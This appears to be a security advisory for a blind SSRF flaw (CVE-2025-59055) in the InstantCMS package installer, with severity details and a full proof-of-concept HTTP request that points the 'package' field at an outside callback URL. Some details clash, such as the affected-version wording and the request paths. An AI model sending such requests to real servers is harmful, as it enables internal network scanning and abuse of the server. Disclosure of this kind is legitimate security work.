InstantCMS <=2.17.3 Blind SSRF via Package Installer (CVE-2025-59055)

### Critical Vulnerability Information #### Vulnerability Type - **Server-Side Request Forgery (SSRF) via package installer** #### Affected Versions - **InstantCMS <= 2.17.3** #### Fixed Version - **None** #### Severity - **CVSS v3 Base Metrics** - Attack Vector: Network - Attack Complexity: Low - Required Privileges: High - User Interaction: None - Scope: Unchanged - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: Low - **CVSS v3.1 Score**: 4.7/10 #### CVE ID - **CVE-2025-59055** #### Weakness - **CWE-918** #### Description - **Summary**: A blind SSRF vulnerability exists in versions of InstantCMS prior to 2.17.3, allowing authenticated remote attackers to initiate arbitrary HTTP/HTTPS requests via the package parameter. - **Details**: Attackers can exploit the installer functionality to send any HTTP/HTTPS request to any website. This could lead to scanning internal networks, invoking local services and their functions, performing DoS attacks, disclosing the server's real IP address (if behind a reverse proxy such as Cloudflare), and exhausting server resources by sending a large number of requests. #### PoC 1. Send the following HTTP request: ```http POST /instancms/admin/install HTTP/1.1 Host: [REDACTED] Content-Length: 545 Cache-Control: max-age=0 Accept-Language: pl-PL,pl;q=0.9 Origin: http://[REDACTED] Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7JY7BrQPQNYRBYBD Upgrade-Insecure-Requests: 1 User-Agent: [REDACTED] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application. Referer: http://[REDACTED]/instances/admin/addons_list Accept-Encoding: gzip, deflate, br Cookie: icms[formadminsettings_admin]=0; icms[dashboard_chart]=%7B%22c%22%3A%22users%22%2C%22s%22%22%3A%22reg%22%2C%22i Connection: keep-alive ------WebKitFormBoundary7JY7BrQPQNYRBYBD Content-Disposition: form-data; name="csrf_token" 8d0ff3e67f8f9e8e1169bbbef148f24499a924ea585993bdc2e08083ec1d5922 ------WebKitFormBoundary7JY7BrQPQNYRBYBD Content-Disposition: form-data; name="addon_id" 1229 ------WebKitFormBoundary7JY7BrQPQNYRBYBD Content-Disposition: form-data; name="package" https://ceas521dd7067c66122-ran1x2n.onetify.com/ ------WebKitFormBoundary7JY7BrQPQNYRBYBD Content-Disposition: form-data; name="submit" 1 ------WebKitFormBoundary7JY7BrQPQNYRBYBD-- ``` 2. The server will issue the request.

Goal Reached Thanks to every supporter — we hit 100%!

InstantCMS <=2.17.3 Blind SSRF via Package Installer (CVE-2025-59055)

More from this source